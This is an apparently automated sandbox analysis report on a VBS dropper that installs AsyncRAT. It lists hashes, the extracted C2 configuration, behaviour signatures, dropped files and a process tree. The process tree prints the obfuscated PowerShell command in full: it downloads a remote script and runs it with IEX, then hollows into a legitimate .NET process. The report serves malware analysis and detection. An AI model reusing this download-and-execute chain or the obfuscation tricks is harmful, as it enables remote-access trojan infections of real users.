Overview

overview

10

Static

static

WAPOLQA77372.vbs

windows7_x64

10

WAPOLQA77372.vbs

windows10_x64

10

Analysis

  • max time kernel
    118s
  • max time network
    161s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    23-10-2021 06:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WAPOLQA77372.vbs

  • Size

    746B

  • MD5

    ce629de1aaf24d2eb4fa640a576193c2

  • SHA1

    6468c284159433cfdf6722b29beb5a3b7a536cca

  • SHA256

    c473c06a6459fdf0ec51659776a5665e561166d899d4ee20048ba0938a3b5388

  • SHA512

    e9272aa122af17ef6e6decb14465eb2000fe424381a0bbe19fb21468036d5bba85941e3b5b70ef1b9938b50615698e2b4d878efce0376bf6f7835d68f244e5f2

Score
10/10
asyncratnew-workrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://thespringreviews.com/.Fainl.txt

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

NEW-WORK

C2

2pop.ddns.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • anti_vm

    false

  • bsod

    false

  • delay

    3

  • install

    false

  • install_folder

    %AppData%

  • pastebin_config

    null

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WAPOLQA77372.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3796
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,'https://+++++++++++++++++++++.com/.Fainl.txt'.Replace('+++++++++++++++++++++','thespringreviews'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:936
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MsMpLics.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\Public\EppManifest.ps1
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4036
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            5⤵
              PID:3872

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\WindowsHost\MsMpLics.vbs
      MD5

      f88416aac0169542e361f858dcbebd1b

      SHA1

      1bfaec27a3ff28621f7c6623043fde6a679245b1

      SHA256

      64fa1d25cbaf04307dea237bc5a7e23a46f88ccd261ceb6541a738b87b8a996c

      SHA512

      f7f54d5c1fc70b4c24e9778965cfcc647b80551c02af414b5ac3eebbba3936371ecc7c83ba829fea8dcccb247f182d99c55b25a1facd92315752be5a38cfbb30

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      5f0b198807cbf23cc1fece5d8d37675b

      SHA1

      e8d651684243cf0cee9ec99e1dec4fbf4567b2b8

      SHA256

      524b4481f8783ebf4c58b7d890db6b888a6710c567af2be54af360480b1e4567

      SHA512

      73a04c3c945b4740750eb59857924b7808443b7c8ac9df6e3b2a3cd11840ed836c1196057c09106b3a9bf5da26fef95a16db410aa62810f7706a0b5f2d8cdfe7

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      fd194f089349de25be820d7faddfda2a

      SHA1

      bd11fd5cd7a71ba154cba89cfb9dc9a1ff2f8f24

      SHA256

      456221ca92e57b7c55aea0005a522edb333247a5ccbb2576bf63eb4cd07bf8e3

      SHA512

      667d02e5ec6b3c2434968a3d4123af589cae9ee4a0a094beb6d4ebcf51351eb5f817f4fe660e17e56c7a7e7ce309c4585f7a8699bd1a3c818193b82ff4f6e4b3

      Download Submit
    • C:\Users\Public\EppManifest.ps1
      MD5

      d31e17d6ecb59bbf806aaf9fe80708b0

      SHA1

      81c4c2895e08a290600baabea94082eff510c5d7

      SHA256

      de8e9e59d1d82253f359e250c64b59540af4abefad8e5881fe864ac2aead8115

      SHA512

      6c5645a46f2de05911c3d569f9a6bdf005ff1288515fa16b12dde763f05059383a596604d5b4d3b4a9f9753d24added882b48c3d6c0f105e7667489fd5161042

      Download Submit
    • memory/936-124-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-164-0x00000236D1E08000-0x00000236D1E0A000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-121-0x00000236D1E00000-0x00000236D1E02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-122-0x00000236D1E03000-0x00000236D1E05000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-123-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-115-0x0000000000000000-mapping.dmp
      Download
    • memory/936-125-0x00000236D23C0000-0x00000236D23C1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/936-126-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-142-0x00000236D1E06000-0x00000236D1E08000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-147-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-148-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-118-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-187-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-119-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-117-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/936-120-0x00000236D1E40000-0x00000236D1E41000-memory.dmp
      Filesize

      4KB

      Download
    • memory/936-116-0x00000236B96B0000-0x00000236B96B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1396-169-0x0000000000000000-mapping.dmp
      Download
    • memory/3872-201-0x0000000002910000-0x0000000002911000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3872-191-0x000000000040C6AE-mapping.dmp
      Download
    • memory/3872-190-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

      Download
    • memory/4036-176-0x000001F02C920000-0x000001F02C922000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-183-0x000001F046933000-0x000001F046935000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-184-0x000001F02C920000-0x000001F02C922000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-181-0x000001F046930000-0x000001F046932000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-188-0x000001F046860000-0x000001F046876000-memory.dmp
      Filesize

      88KB

      Download
    • memory/4036-189-0x000001F046936000-0x000001F046938000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-182-0x000001F02C920000-0x000001F02C922000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-179-0x000001F02C920000-0x000001F02C922000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-178-0x000001F02C920000-0x000001F02C922000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-177-0x000001F02C920000-0x000001F02C922000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-175-0x0000000000000000-mapping.dmp
      Download